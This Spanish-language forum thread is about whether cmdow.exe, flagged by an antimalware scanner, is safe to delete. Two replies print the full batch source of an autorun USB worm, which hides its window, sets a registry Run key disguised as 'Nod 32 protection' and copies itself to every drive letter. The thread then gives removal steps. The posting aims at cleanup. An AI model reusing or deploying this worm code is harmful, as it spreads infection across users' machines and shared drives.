Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

hosting en interdominios
584 lecturas y 6 respuestas
  • Boca de Pez Boca de Pez
    6

    CMDOW.EXE lo puedo eliminar?

    Muy buenas, he pasado el malwarebytes antimalware a mi ordenador y me ha detectado el cmdow.exe como una amenaza, me pide eliminarlo, se puede eliminar sin problema o es algo esencial de windows?

    No quiero que me pase que cuando reinicie el ordenador el windows me de fallo.

    un saludo

    Este tema lleva más de 6 meses inactivo. Es recomendable que abras un nuevo tema para retomar la conversación.
    • El cmdow.exe no es un virus Hace unos días, un compañero de…

      El cmdow.exe no es un virus Hace unos días, un compañero de trabajo estaba "limpiando" de virus su notebook con el NOD32 y, luego de configurarlo para que detectara también lo "potencialmente peligroso", el soft en cuestión detectó al cmdow.exe como "peligroso". En realidad estaba comprimido dentro de una carpeta donde tiene al S.O. comprimido, para pasarlo a un CD y crear un CD de instalación (estaba dentro de un archivo .cab), los que se usan en estos casos. Llegado este momento, debemos analizar varios puntos: 1- el cmdow.exe no estaba/está funcional (o funcionando) ya que estaba comprimido dentro de un archivo .cab, por lo tanto no era/es peligroso. 2- ante la pregunta de, si al instalar ese S.O. (con el futuro CD) y descomprimirse el .cab, el cmdow.exe descomprimido sería peligroso; la respuesta vuelve a ser no (ya veremos por qué). 3- la carpeta en cuestión (donde está el .cab) aloja un S.O. de esos que son autoinstables, como el Windows UE6 del que hablé en otros posts; y esa es la razón por la que debemos estar más tranquilos. 4- si bien el cmdow.exe puede ser usado por algún programa malicioso, en realidad no es un virus. El cmdow.exe es un ejecutable que permite la manipulación de ventanas. Permite que se abran, que se cierren, que cambien de tamaño, y todo sin la intervención del usuario. Por eso es usado en instalaciones de S.O. como el Windows UE, es decir en instalaciones desatendidas, donde el usuario interviene muy poco.

      • Boca de Pez Boca de Pez
        6

        Si tanto te asuste en malware no sé que haces usando Windows.…

        Si tanto te asuste en malware no sé que haces usando Windows. Lo que los programas anti-bichos detectaron fue Windows, y te están diciendo que quites Windows. Además ten cuidado con los programas anti-bichos, pues a veces son más bichos que los propios bichos.

    • Boca de Pez Boca de Pez
      6

      ES UN VIRUS QUE SE CONTAGIA DESDE UN ARCHIVO EJECUTABLE.BAT…

      ES UN VIRUS QUE SE CONTAGIA DESDE UN ARCHIVO EJECUTABLE.BAT

      AQUI ESTA SU ACCIONAR

      cmdow @ /hid

      if %1==/r goto desderun

      start %cd%

      goto saltear

      :desderun

      ::start "%cd%"

      :saltear

      rem ******************************COMIENZO DE INFECCION DE LETRAS *******************************

      :arriba

      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ (

      echo Encontrada unidad %%a

      if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s

      if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q

      if exist %%a:\autorun.inf del %%a:\autorun.inf

      copy %windir%\cmdow.exe %%a:\data.cab

      copy %windir%\maloso.bat %%a:\instalar.bat

      copy %windir%\maloso.inf %%a:\autorun.inf

      )

      rem ******************************FIN INFECCION DE LETRAS ***************************************

      rem ******************************COMIENZO DE JODA **********************************************

      rem ******************************FIN DE JODA ***************************************************

      ping 127.0.0.1 -n 10 > nul

      goto arriba

    • Boca de Pez Boca de Pez
      6

      COPIE INCOMPLETO, AQUI LES PASO TODO LO QUE HACE ESTE VIRUS…

      COPIE INCOMPLETO, AQUI LES PASO TODO LO QUE HACE ESTE VIRUS QUE ENTRE OTRAS COSAS HACE QUE LAS UNIDADES DE DISCO NO SE VEAN DESDE MI PC

      @echo off

      rem *******************************INFECCION DE LA COMPUTADORA EN USO ***************************

      copy data.cab %windir%\cmdow.exe > nul

      copy instalar.bat %windir%\maloso.bat > nul

      copy instalar.bat c:\Nod_32.bat > nul

      echo [autorun] > %windir%\maloso.inf

      echo shellexecute=instalar.bat >> %windir%\maloso.inf

      echo shell\auto\command=instalar.bat >> %windir%\maloso.inf

      echo Windows Registry Editor Version 5.00 > %windir%\maloso.reg

      echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %windir%\maloso.reg

      echo "Nod 32 protection"="c:\\Nod_32 /r" >> %windir%\maloso.reg

      reg import %windir%\maloso.reg

      rem *******************************FIN DE LA INFECCION DE LA COMPUTADORA EN USO *****************

      cmdow @ /hid

      if %1==/r goto desderun

      start %cd%

      goto saltear

      :desderun

      ::start "%cd%"

      :saltear

      rem ******************************COMIENZO DE INFECCION DE LETRAS *******************************

      :arriba

      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ (

      echo Encontrada unidad %%a

      if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s

      if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q

      if exist %%a:\autorun.inf del %%a:\autorun.inf

      copy %windir%\cmdow.exe %%a:\data.cab

      copy %windir%\maloso.bat %%a:\instalar.bat

      copy %windir%\maloso.inf %%a:\autorun.inf

      )

      rem ******************************FIN INFECCION DE LETRAS ***************************************

      rem ******************************COMIENZO DE JODA **********************************************

      rem ******************************FIN DE JODA ***************************************************

      ping 127.0.0.1 -n 10 > nul

      goto arriba

      ----------------------------------

      BORRAR TODA ESTA BASURA (LO PUSE YO)

      %windir%\cmdow.exe

      %windir%\maloso.bat

      %windir%\maloso.inf

      %windir%\maloso.reg

      instalar.bat

      c:\Nod_32.bat

      instalar.bat

      data.cab

      autorun.inf

    • Boca de Pez Boca de Pez
      6

      Este virus en realidad se copia a través de un pendrive,…

      Este virus en realidad se copia a través de un pendrive, cuando este virus detecta unidades de red, copia los tres archivos data.cab, instalar.bat y autorun.inf... PASO 1: si su equipo es un pc pesonal que no está en ninguna red entra la regedit y busca la clave dmdow.exe y maloso elimina las claves y luego borra del disco duro los archivos creados. PASO 2: Si el caso es que existe una red deben desconectar la red y buscar primero el equipo que obtuvo el virus, es decir, la primera maquina contagiada y hacer el PASO 1, luego deben ir a cada equipo con unidades compartidas y eliminar estos tres archivos.